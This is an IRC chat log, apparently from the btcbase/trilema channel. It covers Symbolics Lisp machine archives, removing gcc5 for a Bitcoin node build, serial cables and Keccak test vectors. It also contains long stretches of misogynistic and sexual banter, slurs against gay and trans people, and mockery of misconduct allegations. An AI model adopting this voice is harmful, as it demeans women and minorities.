1735534;1510256981;asciilifeform;http://yahozna.dyndns.org/scratch/genera/layered-products.ISO was also in the box 1735535;1510256993;asciilifeform;and the other isos. 1735536;1510257013;asciilifeform;i'ma see if they match mine some time later when i can be arsed. 1735537;1510257083;asciilifeform;ben_vulpes: the classical cd shipped with sources, but not for some of the more interesting items (e.g. 'ns' chip and pcb layout cad; systemolade of various sorts (e.g. fep) etc ) 1735538;1510257187;ben_vulpes;what means 'fep'? 1735539;1510257193;asciilifeform;frontendprocessor 1735540;1510257203;ben_vulpes;and 'ns'? 1735541;1510257215;asciilifeform;lispm had a board dedicated just to bringing up the lispm proper on boot. had equiv. of sun workstation of the time, in there 1735542;1510257230;asciilifeform;'ns' was their in-house cad thing, 100% lisp 1735543;1510257235;ben_vulpes;oh sweet 1735544;1510257238;asciilifeform;they did own chip layout , pcb, mechanicals, glass, etc. 1735545;1510257302;asciilifeform;see also old threads, http://btcbase.org/log/2017-03-23#1631477 , http://btcbase.org/log/2016-12-05#1578026 1735546;1510257302;a111;Logged on 2017-03-23 03:09 asciilifeform: well, starting with the crown jewels , and down : 1735547;1510257302;a111;Logged on 2016-12-05 17:01 phf: asciilifeform: i thought maybe the design was some historic artifact, but no, none of the cads i looked at (including fucking cmu's NS, which is probably first or second cad in existence) had that split. 1735548;1510257403;trinque;ah, had its own intel management engine eh? 1735549;1510257408;mircea_popescu;:p 1735550;1510257411;asciilifeform;lol 1735551;1510257415;mircea_popescu;don't say that, you'll hurt butts. 1735552;1510257432;trinque;loller 1735553;1510257433;mircea_popescu;(but -- very much yes. the reason "glories of the past" are glories of the past is that they were killed before grew teeth.) 1735554;1510257445;asciilifeform;it was possible to actually program the fep tho 1735555;1510257452;asciilifeform;( machine started 'in' it ) 1735556;1510257470;mircea_popescu;asciilifeform and on original facebook it was possible to yoy know, own your dribblings. 1735557;1510257485;mircea_popescu;!#s bait and switch technology 1735558;1510257485;a111;0 results for "bait and switch technology", http://btcbase.org/log-search?q=bait%20and%20switch%20technology 1735559;1510257489;mircea_popescu;orly. 1735560;1510257553;asciilifeform;( orig lm had no concept whatsoever of seekoority, or even multiple users, i'm almost surprised mircea_popescu was not quick to remind of this ) 1735561;1510257573;mircea_popescu;i am not a hater, im a loler. 1735562;1510257587;asciilifeform;it was pretty lulzy 'money is no object' baroque arch 1735563;1510257596;shinohai;A copy of gcc 1.42 lol 1735564;1510257600;asciilifeform;console had equiv. of workstation cpu at the time ~just for sound~ etc 1735565;1510257688;asciilifeform;shinohai: i'm mirroring whole thing 1735566;1510257698;asciilifeform;(offline, for nao, until isp day) 1735567;1510257721;shinohai;I think I shall too ... depending on size I can likely put on btcinfo server 1735568;1510257751;asciilifeform;http://yahozna.dyndns.org/scratch/3630/ http://yahozna.dyndns.org/scratch/3640/ << moar bolixisms. 1735569;1510257769;asciilifeform;even some rom images, loox like. 1735570;1510257973;phf;asciilifeform: that's josh dersch, he's a seattle retro computing enthusiast. specifically he works on hardware restoration (including a symbolics) for paul alan's http://www.livingcomputers.org, i've met him once or twice 1735571;1510257982;asciilifeform;aa neato 1735572;1510258029;mircea_popescu;oh, which reminds me, we were going to rent a machinem from some similarily located enthusiast's "museum" 1735573;1510258055;asciilifeform;hm? 1735574;1510258062;mircea_popescu;but since we've done all the talking about it that could be done that's that, i take it ? nuts. 1735575;1510258065;mircea_popescu;asciilifeform lemme dig it out 1735576;1510258078;phf;i suspect the sources in question are just dumps from iso, i.e. the high level stuff. i'm positive that he doesn't have the bits that you actually want (i.e. the bedrock code) 1735577;1510258099;asciilifeform;phf: he has a bunch of tape images, i've none, at some point i'ma comb'em 1735578;1510258157;mircea_popescu;http://btcbase.org/log/2017-08-02#1692956 << thereabouts. 1735579;1510258157;a111;Logged on 2017-08-02 22:01 mircea_popescu: ben_vulpes any chance you check out this "people's comp museum" next seattle trip ? 1735580;1510258173;asciilifeform;i dun expect to find ns src for the cpu, but could theoretically find pinout or even data re pcb , which is almost as good 1735581;1510258199;mircea_popescu;http://btcbase.org/log/2017-08-02#1693046 specifically. 1735582;1510258199;a111;Logged on 2017-08-02 22:45 mircea_popescu: asciilifeform http://p.bvulpes.com/pastes/gNGre/?raw=true 1735583;1510258200;asciilifeform;hey ben_vulpes you ever made it to that museum ? 1735584;1510258209;ben_vulpes;haven't made it to seattle in quite some time, no 1735585;1510258302;mircea_popescu;sorry, meant http://btcbase.org/log/2017-08-02#1693044 1735586;1510258302;a111;Logged on 2017-08-02 22:44 mircea_popescu: meanwhile in other lulz : i just brokered a deal whereby we could in principle get candi to run off vintage iron, as a hosting deal :D 1735587;1510258407;ben_vulpes;was that predicated on stopping in at the vintage museum? 1735588;1510258413;mircea_popescu;not at all. 1735589;1510258419;mircea_popescu;was predicated on guy showing up here and closing. 1735590;1510258424;ben_vulpes;a, ok 1735591;1510258445;ben_vulpes;well i don't remember that happening, so i'm pretty sure that it didn't. 1735592;1510258469;mircea_popescu;but whatever, erryone's going to continue in this "i will wait until the world conforms to my webpage and sends email according to my own bureaucratic misrepresentations" elliotism until they fall over. 1735593;1510258488;mircea_popescu;the obvious similarity to the above-discussed coy behaviour entirely hush hush in the fem-bois. 1735594;1510258543;mircea_popescu;"it works sorta-better for the above average and so what if i 100% miss out on the high sigma events!!!" 1735595;1510258786;asciilifeform;ain't that the whole 'female' strategy in compact algo ? 'guaranteed catch of bag of tiny fishes, in return for 0 chance of whale' 1735596;1510258800;mircea_popescu;type b female strategy, yes. 1735597;1510258816;mircea_popescu;the sort that then asks the queen of sparta things. 1735598;1510258943;asciilifeform;hey phf what do you suppose is the mtbf of a present-day bolix 'xl' ? 1735599;1510258963;mircea_popescu;these got disk-fixed tho. so conceivably years. 1735600;1510258981;asciilifeform;they did. still remains the issue of electrolytic caps tho 1735601;1510258983;asciilifeform;iirc 1735602;1510258992;mircea_popescu;mildest failure possible. 1735603;1510259006;mircea_popescu;heck, i thought people pre-emptively replaced those anyway 1735604;1510259026;asciilifeform;depends how it barfs. on some misfortunate boxes cap failure leads to nukeage of ics. 1735605;1510259048;asciilifeform;hence the q. how often can it be expected to melt down. and how recoverable after meltdown. 1735606;1510259049;mircea_popescu;nothing forces you to only change it after it explodes like carribean minds. 1735607;1510259058;mircea_popescu;can change periodically, can change on the basis of heatmap... 1735608;1510259069;asciilifeform;this is indeed tru, not so long ago i recapped an... opteron 1735609;1510259076;asciilifeform;( recall article ) 1735610;1510259086;mircea_popescu;modern toyota mtbf as measured on costa rica highway is ~6 months. 1735611;1510259095;asciilifeform;that's pretty good 1735612;1510259101;mircea_popescu;cuz these people WILL NOT FIX, anything, ever, until it literally breaks. 1735613;1510259133;mircea_popescu;guy on hill had cracks in support wall for months and months. built new wall after massive rain left with portion of his courtyard. 1735614;1510259150;mircea_popescu;not before, god damned it, "waste" concrete on not-collapsed fence, it's uncatholic. 1735615;1510259192;mircea_popescu;(and in lulz of all time : laid bricks in, leaving space to pour reinforced concrete pillars later. not the other way around. because... EASIER THIS WAY!!!) 1735616;1510259215;asciilifeform;lol orc engineering 1735617;1510259220;mircea_popescu;quite. 1735618;1510259223;asciilifeform;pretty sure i saw a similar 'genius' in timis 1735619;1510259227;mircea_popescu;he's optimised for his own scope. 1735620;1510259384;mircea_popescu;hot damn 1735621;1510259386;mircea_popescu;"There's a gigantic error in the ad, yet to most people the ad is totally believable, like this is a hidden camera vid, this error is invisible to them; and if this error was corrected this ad would have never been possible. Do you see it? Why didn't one of these "men" just walk her to her car? Three guys, not one thought of this? She's under your umbrella and your natural instinct was not to protect, to help? So wrap 1735622;1510259386;mircea_popescu;ped up in what it all means and power imbalances that you couldn't just... behave? Ok, forget about chivalry-- out of sheer selfishness, a hail mary longshot? Sure, no expectations, but what the hell, let's see where it goes, maybe she'll ask you out for a Guinness? Were you so insulted by her "entitlement" that you couldn't just try? Or so flustered because a woman that you have stripped of her ordinary humanity and forc 1735623;1510259387;mircea_popescu;ed her to be a symbol of value chose to be near you, your brain couldn't figure out what to do next? In which case her decision to leave you for another umbrella was astutely correct, odd how she and the commercial knew that. All men are good for is an umbrella because she cannot rely on men to act like... men." 1735624;1510259395;mircea_popescu;i'm like converted to tlpism again. 1735625;1510259420;mircea_popescu;the whole time im sitting there going "Wtf why not just walk her to her god damned car, all this management for 10 steps, what are these dudes, planets moving by immutable laws ?!" 1735626;1510259445;mircea_popescu;but they fucking are. can not act. gotta elliot. "WHY NONE OF THESE GIRLS TALK TO ME!!1" "did you talk to them ?" 1735627;1510259505;mircea_popescu;"i need uber for someone else's bored dad to take me to ballet practice ; this is muchly preferable to talking to my own." 1735628;1510259525;BingoBoingo;http://btcbase.org/log/2017-11-09#1735101 << Flouroplastics make the best fishing line 1735629;1510259525;a111;Logged on 2017-11-09 16:19 asciilifeform: there are other fluoroplastics , that are easier to work / other desirable parameters tweaked 1735630;1510259531;BingoBoingo; http://btcbase.org/log/2017-11-09#1735116 < Nah, what you want is aluminum bronze 1735631;1510259531;a111;Logged on 2017-11-09 16:23 asciilifeform: surgical steel would also work 1735632;1510259533;mircea_popescu;who the fuck thinks this is "technology" ?! it's not fucking technology, it's elaborate psycho-orthopedics. 1735633;1510259552;BingoBoingo;http://btcbase.org/log/2017-11-09#1735161 << Closer to 10 for only snake that matters to own. Anything more ~75 to rent drain machine or special ~18 toilet snake 1735634;1510259552;a111;Logged on 2017-11-09 16:36 mircea_popescu: so buy a snake, big whoop. 20 bux at BingoBoingo 's store. 1735635;1510259568;BingoBoingo;http://btcbase.org/log/2017-11-09#1735163 << If house is defective in this way throne comes apart. 2 ~20 kilo lifts 1735636;1510259568;a111;Logged on 2017-11-09 16:36 asciilifeform: but you also gotta be able and willing to lift the throne ( old houses in usa have no cleanplug ) etc. 1735637;1510261576;asciilifeform;mircea_popescu: the ad in question seems to have vanished ? 1735638;1510261587;asciilifeform;( at any rate it dun load ) 1735639;1510261691;mircea_popescu;https://www.youtube.com/watch?v=p8Ft-3bmUcE 1735640;1510261696;mircea_popescu;googletards gotta be special. 1735641;1510261702;asciilifeform;ok worx ty 1735642;1510261726;asciilifeform;lol plasticar 1735643;1510261737;mircea_popescu;toyotallac. 1735644;1510261754;asciilifeform;mercehonda 1735645;1510261789;mircea_popescu;but ballas' point is fundamentally sound : the "fridge logic" moment on ~the absence of which~ the whole multi-mn attempt rests is... it WILL NOT occur to you to propose to her. 1735646;1510261800;mircea_popescu;anything, no matter the circumstances, whitebread ustard can be RELIED ON not to do. 1735647;1510261851;ben_vulpes;well i mean look what happens when you do propose! https://www.rawstory.com/2017/11/pennsylvania-man-gouged-out-teens-eyes-and-broke-her-neck-when-she-refused-to-marry-him/ 1735648;1510261860;mircea_popescu;... 1735649;1510261867;ben_vulpes;only a terrorist would proposition a woman 1735650;1510261890;mircea_popescu;weird, cuz the majority of terrorists are beta male rejects in their originating society. 1735651;1510261923;mircea_popescu;girls there put out ~on par with any other girls ; but the future terrorist DOES NOT ASK because, just like every other eventual elliot, DOES NOT PERCEIVE he might. 1735652;1510261925;asciilifeform;reads more like pcp doper than 'terrorist' 1735653;1510261939;mircea_popescu;because whatever, "his daddy';s not rich enough". honey we can't afford another kid, as if THAT is how it goes. 1735654;1510261992;asciilifeform;from same rag, 'The man accused of tackling Kentucky Senator Rand Paul and breaking his ribs as he was mowing his lawn pleaded not guilty on Thursday to a misdemeanor assault charge, a court official said.' 1735655;1510262029;mircea_popescu;get this : arab 30yos with no wealth (sheep, camels, women) and no prospects, fascinated by eg chet (happenstantially i was the definitive arab world aspirational immage, young man with older white woman in tow) talked TO ME about it. not to her. 1735656;1510262062;asciilifeform;mircea_popescu: how did it go? 'can i borrow this' ? 1735657;1510262093;mircea_popescu;nope, not at all. more like "what bands do you like", in the transparently/invisible hopes that if got right, who knows, maybe has a chance IN A DISTANT AND ABSENT FUTURE 1735658;1510262109;mircea_popescu;what the beta boi wants from the inadvertent oracle is ... a score. 1735659;1510262114;asciilifeform;lol, 'hey we like the same type of pie, yes you can borrow my chix' ?! 1735660;1510262125;mircea_popescu;no, he didn't want this one. he wanted an absent one. 1735661;1510262149;asciilifeform;the one kept in spare tyre compartment ? or where 1735662;1510262171;mircea_popescu;meanwhile in the "uber repressive" society i had no problem checking out the women's tits while they breastfed, as an act of public intimacy, to not discuss private intimacy. cuz i DIDN'T ask -- not their "owner" males, and generally no one. 1735663;1510262201;mircea_popescu;the pinnacle of this being that at one point in the subway -- gender segregated, you get it ? -- we got in the first car (women only!!) which made the gals chuckle and teh guys get REALLY bothered, one car over. 1735664;1510262235;mircea_popescu;asciilifeform one allah keeps in his fate compartment for him, da fuck do i know. the problem with masturbators is that the imago must not gain carnality. 1735665;1510262276;asciilifeform;btw i realized today that 'задрот' does not properly translate to eng 1735666;1510262281;asciilifeform;it isn't exactly 'wanker' 1735667;1510262289;mircea_popescu;"she's no longer hot! why does she have an abdominal fold ??" "cuz she's a woman" "that's not what i saw on bangbros" "yes, well, they only film some angles" 1735668;1510262323;mircea_popescu;asciilifeform romanian word is "zadar", "waste" 1735669;1510262347;asciilifeform;neh but see задрот is specifically 'terminal masturbator' 1735670;1510262376;asciilifeform;as in the kind where 'the imago must not gain carnality' etc 1735671;1510262394;mircea_popescu;not same root as за даръ ? 1735672;1510262399;asciilifeform;nope 1735673;1510262401;mircea_popescu;ah ok 1735674;1510262405;asciilifeform;from дрочить 1735675;1510262408;asciilifeform;( to wank ) 1735676;1510262441;asciilifeform;( i suspect a europistani root there, but nfi from whom specifically it came ) 1735677;1510262482;shinohai;!!rated whaack 1735678;1510262482;deedbot;shinohai has not rated whaack. 1735679;1510262487;shinohai;hmmm 1735680;1510262557;shinohai;!!rate whaack 1 we did spanish stuff. #trilema 1735681;1510262560;deedbot;Get your OTP: http://p.bvulpes.com/pastes/ScWmz/?raw=true 1735682;1510262711;shinohai;!!v 8EC99BF711E7CE3F30D74C32199A4EB21C8FBF10DB602AF13F9D6DA97420DCD9 1735683;1510262712;deedbot;shinohai rated whaack 1 << we did spanish stuff. #trilema 1735684;1510262975;shinohai;Of course it's suspicious activity report, duh! http://wotpaste.cascadianhacker.com/pastes/KNgVS/?raw=true 1735685;1510263706;mircea_popescu;in other strangely related insane nonsense, https://thelastpsychiatrist.com/images/tom%20ford%20penis.jpg 1735686;1510263728;mircea_popescu;"who the fuck would rub penis scent on himself ?" "a woman" "and who else ?" 1735687;1510263784;shinohai;Nah they fucked that up 1735688;1510263802;shinohai;If yer gonna sell penis scent, you target traps and fags 1735689;1510263818;mircea_popescu;or cubical drones with a vp prospect. 1735690;1510263837;mircea_popescu;everyone else, either has it or knows where to get it. 1735691;1510263837;shinohai;xD 1735692;1510263885;mircea_popescu;in which vein, "why does this place smell of dick ?!" "i farted." 1735693;1510265030;asciilifeform;!#s boar mate 1735694;1510265031;a111;1 result for "boar mate", http://btcbase.org/log-search?q=boar%20mate 1735695;1510266074;ben_vulpes;now that the washington post has enshrined the notion that allegations are sufficient to disqualify candidates from races in america, how long d'you figure it'll take before the bitcoin bounties for allegations leading to exit of democrats from campaigns crops up? 1735696;1510266173;trinque;"be the change you want to see" ! 1735697;1510266363;ben_vulpes;aha but ho damn also louis ck now purged from hollywoo as well 1735698;1510266373;ben_vulpes;clearly the women are winning! 1735699;1510266606;trinque;lol always with the "and then he started jacking off in front of me!" 1735700;1510266721;mircea_popescu;which one is this one ? 1735701;1510267152;trinque;fat cuck whose whole routine amounts to "dude guys not cool" and feigning exasperation from pantsuit perspective 1735702;1510267177;trinque;so, of course wanted to wet his diaper in front of women or w/e 1735703;1510267534;mircea_popescu;ah 1735704;1510267574;mircea_popescu;in other news, i just had a conversation with a bird. 1735705;1510267589;asciilifeform;http://btcbase.org/log/2017-11-09#1735695 << how dumb would somebody have to be to send $goodies to dnc and expect btc back ? 1735706;1510267589;a111;Logged on 2017-11-09 22:21 ben_vulpes: now that the washington post has enshrined the notion that allegations are sufficient to disqualify candidates from races in america, how long d'you figure it'll take before the bitcoin bounties for allegations leading to exit of democrats from campaigns crops up? 1735707;1510267607;asciilifeform;or rnc or whatever fiatolade people 1735708;1510267610;mircea_popescu;the national bird of costa rica is some kind of thrush. he's splendid, bright yellow and things. and his call is like teep-te-deep. teep-teep. 1735709;1510267620;asciilifeform;mircea_popescu: is this the dead hdd bird ? or other 1735710;1510267623;mircea_popescu;very fucking hysterical. so i mocked it, and it... ANSWERED! 1735711;1510267872;mircea_popescu;asciilifeform different. 1735712;1510268353;ben_vulpes;nah asciilifeform moar like "step forward with allegations against $senator, get btc if they withdraw. first 5 to draw on their tits get documented media exposure get a bitcent 1735713;1510268398;asciilifeform;ben_vulpes: again who would be dumb enough to blow btc on this ? and who dumb enough to believe in the promise of btc for this 1735714;1510268432;asciilifeform;do you , personally care , ben_vulpes , which muppet 'withdraws' and is replaced by which other muppet ? 1735715;1510268435;asciilifeform;i can't say that i do 1735716;1510268552;ben_vulpes;who would be dumb enough to blow btc emplacing $box at $location either 1735717;1510268565;asciilifeform;box, nominally, ~does~ something 1735718;1510268594;ben_vulpes;promise from nobody worth nothing, promise backed by the republic worth more than anything dnc can ever offer. 1735719;1510268636;asciilifeform;near as i can tell, 'which senator' matters approx the same amount as 'which wrestler' 1735720;1510268721;ben_vulpes;who would ever pay a dollar in ddos to cost someone ten, while on the topic 1735721;1510268777;asciilifeform;not sure i see the parallel 1735722;1510268804;asciilifeform;so you publish dirt on 3 muppets, 4th, on whom you were not able to find any, wins. where's the win from this from your pov ? 1735723;1510268829;ben_vulpes;not even a matter of publishing dirt, wapo has decreed that actual dirt is immaterial, accusations are all that matter. 1735724;1510268858;asciilifeform;it isn't about 'accusations', you or i could accuse all day long and they will print 0 1735725;1510268911;ben_vulpes;quite definitely is about accusations, all one needs is a 'cleaning lady'. 1735726;1510268919;asciilifeform;and a newyorktimes. 1735727;1510268938;ben_vulpes;dontcha know, asciilifeform ? demanding proof is just the patriarchy working to oppress women, keep their allegations quiet. 1735728;1510268956;ben_vulpes;reasoning from first principles is racist, etc 1735729;1510268963;asciilifeform;when the blessedly anointed accuse. when evil terrorist -- not worth mention 1735730;1510269033;ben_vulpes;when the pantsuit controlled twitter and instagram, this might have been so 1735731;1510269054;ben_vulpes;times and wapo etc now quiver in fear of not being fast enough on the trigger with the allegations. 1735732;1510269064;asciilifeform;did i sleep through a tragic fire where twatter et al mysteriously burned down ? 1735733;1510269083;ben_vulpes;well they did give up on the verification play today 1735734;1510269093;asciilifeform;waiwat 1735735;1510269103;ben_vulpes;"nice people only" or some such 1735736;1510269123;ben_vulpes;https://www.usatoday.com/story/tech/2017/11/09/twitter-halts-verification-over-checkmark-charlottesville-rally-organizer/848314001/ as a random sample 1735737;1510269158;asciilifeform;lol! 1735738;1510269175;asciilifeform;'Verification was meant to authenticate identity & voice but it is interpreted as an endorsement or an indicator of importance," Twitter said in a tweet announcing its decision to pause the verification program. "We recognize that we have created this confusion and need to resolve it. We have paused all general verifications while we work and will report back soon.' 1735739;1510269210;asciilifeform;'hey let's all use centrally-controlled faux wot, what could be the down side' 1735740;1510269236;ben_vulpes;allll you gotta do is find a further out-there minority or 'oppressed person', and everyone will race to validate their lived experience. trend has been towards this for years, don't know how you don't see it. 1735741;1510269405;asciilifeform;validate their lived experience << lel 1735742;1510269437;asciilifeform;'your livedexperience has failed checksum and does not validate. please try again' 1735743;1510269459;asciilifeform;i still dun fully grasp what this obummerism specifically means 1735744;1510269472;asciilifeform;aside from the 'validation chamber' or what was it, in hanbot's gulag story 1735745;1510269612;ben_vulpes;~"you matter, and what happened to you is important" 1735746;1510269659;ben_vulpes;related: http://www.cnn.com/2017/11/08/us/air-force-academy-racist-message-trnd/index.html 1735747;1510269698;davout;http://btcbase.org/log/2017-11-09#1735725 <<< as usual the french did it before it became mainstream 1735748;1510269698;a111;Logged on 2017-11-09 23:08 ben_vulpes: quite definitely is about accusations, all one needs is a 'cleaning lady'. 1735749;1510269731;davout;http://btcbase.org/log/2017-11-09#1735727 <<< lack of empathy, disrespect for feelings etc. 1735750;1510269731;a111;Logged on 2017-11-09 23:08 ben_vulpes: dontcha know, asciilifeform ? demanding proof is just the patriarchy working to oppress women, keep their allegations quiet. 1735751;1510270350;asciilifeform;in very other vintage lulz, http://www.cpu-ns32k.net 1735752;1510271095;asciilifeform;in other olds, http://yahozna.dyndns.org/scratch/genera/distribution/sys/sys2/bignum.lisp << ( and yes it is on the cd ) >> quite sad bignum stack imho 1735753;1510271170;asciilifeform;and nearly unreadable to modern eyes 1735754;1510271327;asciilifeform;to be fair, some of the screaming ugliness is on account of the tangle of arithmetic chips they were stuck using. 1735755;1510271476;asciilifeform;https://archive.is/TDImw << copy, for l0gz 1735756;1510272100;cruciform;currently building TRB node 1735757;1510272137;asciilifeform;cruciform: problems ? 1735758;1510272161;cruciform;not yet; just felt like sharing! 1735759;1510272205;cruciform;got a FG to audit after 1735760;1510272229;asciilifeform;oh you're the uk fella 1735761;1510272242;asciilifeform;only now plugged it in ?! 1735762;1510272260;cruciform;haven't even done that yet :P 1735763;1510272335;asciilifeform;have fun 1735764;1510273805;cruciform;got an error during build: https://pastebin.com/cdWPDx2M - any ideas? 1735765;1510273833;ben_vulpes;gcc 5? 1735766;1510273838;asciilifeform;^ 1735767;1510273882;cruciform;yea 1735768;1510273887;asciilifeform;get rid of it 1735769;1510273899;asciilifeform;and i mean, all of it. no gcc5 on the box anywhere. 1735770;1510273933;cruciform;ok, thanks 1735771;1510273950;asciilifeform;( unless yer a gentoo virtuoso and can have 9000 compilers safely co-exist. otherwise, kill. it. with. fire. ) 1735772;1510274066;asciilifeform;!#s gcc5 1735773;1510274066;a111;28 results for "gcc5", http://btcbase.org/log-search?q=gcc5 1735774;1510274069;asciilifeform;^ see also. 1735775;1510274091;asciilifeform;gcc5 was made by wreckers. 1735776;1510274245;asciilifeform;see also esp. thread http://btcbase.org/log/2017-06-03#1665148 . 1735777;1510274245;a111;Logged on 2017-06-03 02:40 erlehmann: i don't get the hate against optimizing c compilers at all 1735778;1510274797;cruciform;asciilifeform: something like "sudo apt-get purge --auto-remove gcc-5" ? 1735779;1510274824;asciilifeform;i cannot immediately say how to do this surgery on non-gentoo linuxen 1735780;1510274831;asciilifeform;might want to ask mod6 , ben_vulpes , trinque , shinohai 1735781;1510274864;asciilifeform;if you make the cuts in the wrong order, could easily end up without a compiler. 1735782;1510274898;cruciform;yea, that's what I'm concerned about. Running Ubuntu 16.04, btw 1735783;1510274898;asciilifeform;( which may be a trivial fix or an hour-long headache depending on what's on yer box ) 1735784;1510274961;shinohai;ya know i think ive forgotten *how* to do this the debian away 1735785;1510275205;asciilifeform;cruciform: at least 1 person here knows the answer to this, you might want to check back later. 1735786;1510275262;cruciform;asciilifeform: thanks! will do. In other matters, is this the correct kinda cable for a FG? https://www.amazon.co.uk/Raspberry-Programming-Serial-Windows-Supported/dp/B01N4X3BJB/ref=sr_1_1_sspa?ie=UTF8&qid=1510275254&sr=8-1-spons&keywords=ttl+cable&psc=1 1735787;1510275464;asciilifeform;cruciform: pretty sure i shipped a number of units with that exact cable 1735788;1510275496;asciilifeform;it's a pl2303 , ought to work ( though see diana_coman 's recent thread , on certain egregiously braindamaged linuxen there is a bug ) 1735789;1510275528;cruciform;yea, saw that - don't think she had any problems with ubuntu 1735790;1510275875;asciilifeform;cruciform: the colours on your cable may not match exactly the traditional one; in that case look up which wire is rx, which - +5v, which - ground. 1735791;1510275902;asciilifeform;( leave 'tx' alone . ) 1735792;1510275995;cruciform;thanks! 1735793;1510276090;asciilifeform;np 1735794;1510276093;*;asciilifeform bbl 1735795;1510281549;lobbes;!~ticker --market all 1735796;1510281556;jhvh1;lobbes: Bitstamp BTCUSD last: 7282.95, vol: 14418.62854468 | Bitfinex BTCUSD last: 7246.0, vol: 50570.46137361 | Kraken BTCUSD last: 7300.0, vol: 4877.60280168 | Volume-weighted last average: 7257.39539951 1735797;1510282074;mod6; !~later tell cruciform <+cruciform> asciilifeform: something like "sudo apt-get purge --auto-remove gcc-5" ? << This ~ought~ to work. However, it's been a while since I had to do all of these gyrations myself. Please let me know if you need help on this, I'll do what I can. Salud. 1735798;1510282099;mod6;Pardon me. 1735799;1510282105;mod6;!~later tell cruciform <+cruciform> asciilifeform: something like "sudo apt-get purge --auto-remove gcc-5" ? << This ~ought~ to work. However, it's been a while since I had to do all of these gyrations myself. Please let me know if you need help on this, I'll do what I can. Salud. 1735800;1510282105;jhvh1;mod6: The operation succeeded. 1735801;1510282617;BingoBoingo; very fucking hysterical. so i mocked it, and it... ANSWERED! << Very nice. This is very motivations for digesting meters of audio. 1735802;1510282760;mod6;:D 1735803;1510282994;BingoBoingo;In other news, Uruguay datacenter is offering to help petition to get IPs assigned through LACNIC 1735804;1510283822;BingoBoingo;And we have a quote, extracting info from PDF 1735805;1510288222;BingoBoingo;!~later tell mircea_popescu http://wotpaste.cascadianhacker.com/pastes/GvF3m/?raw=true 1735806;1510288222;jhvh1;BingoBoingo: The operation succeeded. 1735807;1510303040;mircea_popescu;http://btcbase.org/log/2017-11-09#1735714 << dood, btc is easy. literallty given away for doing ~nothing. 1735808;1510303040;a111;Logged on 2017-11-09 23:00 asciilifeform: do you , personally care , ben_vulpes , which muppet 'withdraws' and is replaced by which other muppet ? 1735809;1510303061;mircea_popescu;that the fucktards stubbornly refuse to do it speaks to the fucktards' utterly incredible fucktardation, not to how hard it is to get. 1735810;1510303113;mircea_popescu;whole generation of stupid cunts will have to explain to their granddaughters, "and then in 2017 i was a cretin and missed on the opportunity to make 2 bitcents writing on my ugly ass tits nobody cares about, and that's why you can't have your private island. o look, barrista break's over, back to work"\ 1735811;1510303141;mircea_popescu;which of course they'll pretend like they don't have to do then, just like they pretended they don't have to do now. 1735812;1510304474;mircea_popescu;http://btcbase.org/log/2017-11-09#1735724 <<< that's not the important part. the important part is that the whole population of libertards, feminists etcetera could accuse you or i all day long, shittington post will... print 0. 1735813;1510304474;a111;Logged on 2017-11-09 23:07 asciilifeform: it isn't about 'accusations', you or i could accuse all day long and they will print 0 1735814;1510304485;mircea_popescu;the crap only works ON their own pantsuit. 1735815;1510304507;mircea_popescu;so no, it isn't about accusations. it's about the implicit vulnerability of being pantsuit. 1735816;1510304518;mircea_popescu;sooner or later, yes they will fuck you over. it's definitional. 1735817;1510308312;diana_coman;http://btcbase.org/log/2017-11-10#1735788 <- I don't really see how it is linux' fault here; so prolific used to make the pl2303 and old linux worked fine with it and still does; THEN they (or chinese cheap copies dunno) made a DIFFERENT thing pl2303x that has however the same serial id and everything so you can't distinguish between them before plugging them in pretty much; and so yes, old linux won't work because it sees it as pl2303 whe 1735818;1510308312;a111;Logged on 2017-11-10 00:58 asciilifeform: it's a pl2303 , ought to work ( though see diana_coman 's recent thread , on certain egregiously braindamaged linuxen there is a bug ) 1735819;1510308312;diana_coman;n it is "new" pl2303x; *newer* linux will work because basically they have been adapted to the idiocy so they check and adapt 1735820;1510308890;diana_coman;for the curious there are in fact 2 prolific-stamped documents describing pl2303 and pl2303x; pl2303x seems to be a sort of upgrade to 64bits but why couldn't it be properly identified as distinct I don't know 1735821;1510320915;asciilifeform;diana_coman: this is unfortunately quite typical. 1735822;1510321047;asciilifeform;must've happened long ago -- all of my gentoo boxen work with the ttl snakes 1735823;1510321180;asciilifeform;ALL ttl snakes i currently know of, are stereotypicachinese rubbish 1735824;1510321196;asciilifeform;without exception 1735825;1510321269;asciilifeform;not only the driver thing, but even the plastic shells come apart when handled one too many times; the sockets come off the wires; etc 1735826;1510321275;diana_coman;asciilifeform, myeah; ftr I opened them to look but - as expected - not much to see 1735827;1510321491;asciilifeform;pc is epic piece of shit, with modern vlsi it could have 50 working uarts for a few cents. instead ships with 0 1735828;1510321521;diana_coman;in other things: I have been playing around with keccak and in particular with PeterL's ada implementation; as far as I can see it conforms to Version 3.0 keccak reference but I'm not sure re testing; any known test vectors for it? (the test vectors on current keccak's site seem to be for sha3) 1735829;1510321542;asciilifeform;old site had'em 1735830;1510321557;diana_coman;ah,hm, I thought they were same; I'll dig up the archive then and check 1735831;1510321559;asciilifeform;gotta find a copy somehow ( asciilifeform doesnt appear to have ) 1735832;1510321569;diana_coman;hopefully still them, will see 1735833;1510321638;asciilifeform;it definitely had the pre-usgization keccak gold standard. can generate tests from this. 1735834;1510321986;asciilifeform;http://btcbase.org/log/2017-11-10#1735812 << noshit.jpg, it works for kicking people out of номенклатура , and this dun work if yer not in it to begin with 1735835;1510321986;a111;Logged on 2017-11-10 09:01 mircea_popescu: http://btcbase.org/log/2017-11-09#1735724 <<< that's not the important part. the important part is that the whole population of libertards, feminists etcetera could accuse you or i all day long, shittington post will... print 0. 1735836;1510322074;asciilifeform;tho there was that one chix with the cartoon, who was sacked from her job as... cachier ? ( whatever happened to her ) 1735837;1510322188;asciilifeform;http://btcbase.org/log/2017-11-10#1735807 << lol not everybody has titz ( and some have already fired theirs !1) 1735838;1510322188;a111;Logged on 2017-11-10 08:37 mircea_popescu: http://btcbase.org/log/2017-11-09#1735714 << dood, btc is easy. literallty given away for doing ~nothing. 1735839;1510322227;asciilifeform;from asciilifeform's pov, btc is virtually impossible to get 1735840;1510322252;asciilifeform;( see also http://btcbase.org/log/2017-10-28#1730156 ) 1735841;1510322252;a111;Logged on 2017-10-28 07:14 asciilifeform: http://btcbase.org/log/2017-10-27#1730037 << am i the only 1 for whom spending btc feels moar like selling organs than spending money, tho 1735842;1510322509;asciilifeform;http://btcbase.org/log/2017-11-10#1735810 << this isnt any sadder than , e.g., the 5 whole coinz asciilifeform lost in the alphago thing. or the infamous toyota, etc 1735843;1510322509;a111;Logged on 2017-11-10 08:38 mircea_popescu: whole generation of stupid cunts will have to explain to their granddaughters, "and then in 2017 i was a cretin and missed on the opportunity to make 2 bitcents writing on my ugly ass tits nobody cares about, and that's why you can't have your private island. o look, barrista 